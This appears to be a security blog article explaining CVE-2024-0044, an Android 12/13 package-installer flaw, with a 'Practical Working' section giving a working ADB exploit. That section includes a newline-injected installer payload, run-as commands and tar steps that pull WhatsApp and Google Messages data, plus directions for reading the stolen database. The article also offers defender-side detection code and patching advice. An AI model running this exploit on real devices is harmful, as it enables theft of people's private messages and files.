
Unlocking the Android 12 and 13 Vulnerability: CVE-2024-0044 ADB Exploitation

Every time Android releases a new update, it aims to enhance security. However, vulnerabilities such as CVE-2024-0044 still affect Android versions 12 and 13. If you’ve heard of ADB (Android Debug Bridge), you’ll know it’s meant for developers to communicate with an Android device. Still, attackers can take advantage of this tool to break into your phone and steal your private data, which is exactly what happens with this vulnerability. So, let’s break this down.

What we are going to learn in this article

>What is ADB?

>What is CVE-2024-0044?

>How Do Hackers Use This?

>Practical Working

>Real-Life Impact: Why Should You Care?

>How To Protect Yourself

>Why This Matters To Cybersecurity Pros

What is ADB?

ADB, or Android Debug Bridge, is a powerful tool that allows developers to communicate with and control an Android device from a computer. But when misused, especially with this vulnerability, it lets attackers enter your phone without you even knowing. Think of it as leaving your front door open so that anyone can walk into your house without your permission.

What is CVE-2024-0044?

CVE-2024-0044 is a serious vulnerability in Android 12 and 13 that permits hackers to pretend they’re any app on your phone. With it, they can use ADB to get inside other apps and peek at your messages, contacts, and even personal files, all without you doing anything. This happens because Android wasn’t properly validating the input it received when apps are installed, especially when the installation is driven through ADB. Attackers can use this hole in the system to take control of the device.

How Do Hackers Use This?

It’s simpler than it looks. If someone can get physical access to your Android phone or trick you into enabling ADB, they’re in. Here’s how it works:

  1. Access ADB: The attacker gets you to enable ADB or physically connect to your device. It could be through a USB cable or even wirelessly.

  2. Run Commands: Using specific scripts or commands, they can make Android think they’re a trusted app, which lets them access private data.

  3. Steal Data: Once inside, they can look at your unencrypted messages, contacts, and files. In some cases, they can even install other apps or modify what’s on your device.


Practical Working

CVE-2024-0044 is a serious security issue affecting Android versions 12 and 13. It involves a flaw in the createSessionInternal function of the PackageInstallerService.java file. Because that function does not adequately validate its input, a local attacker can escalate privileges without any user interaction: by manipulating the session creation process, they gain unauthorized access to sensitive data and can perform actions they shouldn't be able to.

Meta security discovered the problem, and Tiny Hack has shared a summary of the proof of concept. For details on the security fix, refer to the Android security bulletin.

Prerequisites

1. Turn on USB debugging on your phone and connect it to your computer, either with a USB cable or via wireless debugging.

2. Download any APK to your computer.

How to use the tool:

python cve_2024_0044.py -h

usage: cve_2024_0044.py [-h] -P P -A A
CVE-2024-0044: run-as any app @Pl4int3xt

options:
  -h, --help   show this help message and exit
  -P P         package name (default: None)
  -A A         apk file path (default: None)

-P specifies the target package name you want to run as

-A specifies the APK file to push to the device

Exploitation:

Run the tool:

python3 cve_2024_0044.py -P com.whatsapp -A /home/pl4int3xt/Downloads/F-Droid.apk

A payload.txt file like the one below is generated, and the following commands are then run inside an adb shell:

pl4int3xt ~>  adb shell
pixel:/ $ PAYLOAD="@null
> victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pixel:/ $ pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk
Success

Now we will extract the WhatsApp data with these commands:

pixel:/ $ mkdir /data/local/tmp/wa/
pixel:/ $ touch /data/local/tmp/wa/wa.tar
pixel:/ $ chmod -R 0777 /data/local/tmp/wa/
pixel:/ $ run-as victim
pixel:/data/user/0 $ tar -cf /data/local/tmp/wa/wa.tar com.whatsapp

  1. Create a temporary directory: mkdir /data/local/tmp/wa/

  2. Create the placeholder for a tar file: touch /data/local/tmp/wa/wa.tar

  3. Set wide-open permissions: chmod -R 0777 /data/local/tmp/wa/ ensures that any user can read, write, and execute within this directory.

  4. Switch user context: run-as victim gives the shell the same permissions as the "victim" user.

  5. Archive the target application's data: tar -cf /data/local/tmp/wa/wa.tar com.whatsapp creates a tarball of the WhatsApp data directory.

Now we will extract the Google Messages data.

Use the following command:

plaintext@archlinux ~/D/c/p/cve_2024_0044 (feature)> python3 ./cve_2024_0044.py -P com.google.android.apps.messaging -A ~/Downloads/F-Droid.apk

Repeat the steps above. After pulling out the wa.tar file, untar it and open the database at com.google.android.apps.messaging/databases/bugle_db with SQLite browser or any other tool to view the conversations.
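As an added defender-side example (not code from the original post or from the PoC tool), the block below shows two checks relating to the input-validation flaw and the payload above: an installer-name validation of the kind createSessionInternal lacked (the exact upstream fix is not reproduced), and a forensic audit of records in the packages.list format that the injected "victim" entry ends up in. The field layout assumed for that file (name uid debuggable dataDir ...) is inferred from the payload line on this page, and the sample records are constructed.

```python
# Added example: defender-side checks for CVE-2024-0044 (not the PoC tool's code).
# The packages.list field layout below is an ASSUMPTION inferred from the
# injected line "victim 10289 1 /data/user/0 ..." shown on this page.
import re
from collections import defaultdict

# Java-style package name: at least two dot-separated identifier segments.
PKG_NAME = re.compile(r"^[A-Za-z][A-Za-z0-9_]*(\.[A-Za-z][A-Za-z0-9_]*)+$")

# Constructed sample: the real app, the injected entry from the payload above,
# and a legitimately debuggable app that must not be flagged.
SAMPLE_PACKAGES_LIST = """\
com.whatsapp 10289 0 /data/user/0/com.whatsapp default:targetSdkVersion=33 3003 0 1234 1 @null
victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null
com.example.dbg 10300 1 /data/user/0/com.example.dbg default:targetSdkVersion=33 none 0 1 1 @null
"""

def is_safe_installer_name(name):
    """Accept only a plain package name (or none). Newlines or spaces would let
    the value terminate one packages.list record and start a forged one."""
    return name is None or bool(PKG_NAME.match(name))

def parse_line(line):
    f = line.split()
    if len(f) < 4:
        return None
    return {"name": f[0], "uid": int(f[1]), "debuggable": f[2] == "1", "data_dir": f[3]}

def audit_packages_list(text):
    """Return (package, reason) pairs for records that look forged. A shared uid
    is legitimate for sharedUserId apps, so treat that finding as a lead, not proof."""
    entries = [e for e in map(parse_line, text.splitlines()) if e]
    by_uid = defaultdict(list)
    for e in entries:
        by_uid[e["uid"]].append(e["name"])
    findings = []
    for e in entries:
        if not PKG_NAME.match(e["name"]):
            findings.append((e["name"], "not a valid package name"))
        others = [n for n in by_uid[e["uid"]] if n != e["name"]]
        if others:
            findings.append((e["name"], f"uid {e['uid']} shared with {', '.join(others)}"))
        if e["debuggable"] and not e["data_dir"].endswith("/" + e["name"]):
            findings.append((e["name"], "debuggable, but data dir is not its own"))
    return findings
```

Run audit_packages_list over a pulled packages.list to spot a forged debuggable record that shares an app's uid; the injected line trips all three checks while the normal debuggable app trips none.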

Real-Life Impact: Why Should You Care?

The biggest risk here is data theft. For example, attackers can extract your WhatsApp or Google Messages conversations as shown above. That might not seem like much at first, but think about all the sensitive data you keep in those apps. Even worse, if your device isn’t patched with the latest updates, hackers could install malicious apps or take over the phone entirely.

How to Protect Yourself

Now that we know how dangerous this vulnerability is, here’s what you can do to stay safe:

  1. Update Your Device: Android has already released patches for this vulnerability in versions after 12L. Make sure your phone is running the latest security updates.
  2. Turn Off ADB: Most people don’t need ADB enabled, so it’s best to keep it off unless you’re a developer. Go to your Developer options and switch it off.
  3. Be Careful with Apps: Don’t install apps from unknown sources. Stick to official app stores like Google Play.
  4. Encrypt Your Data: This might sound technical, but it’s a great safeguard. If your phone’s data is encrypted, even if someone breaks in, they’ll have a hard time reading anything.

Why This Matters to Cybersecurity Pros

For those of you in cybersecurity, understanding this vulnerability is crucial. It shows just how powerful something like ADB can be, not just for developers but also for attackers. As cybersecurity experts, you can use this knowledge to help people secure their devices better or run penetration tests to ensure no one is vulnerable.

The CVE-2024-0044 vulnerability is a reminder that even trusted tools like ADB can be misused. Whether you're an Android user or a cybersecurity expert, it's crucial to understand how these exploits work so that we can stay ahead of attackers. If you haven't already, update your device, disable unnecessary settings like ADB, and keep a close eye on your apps.
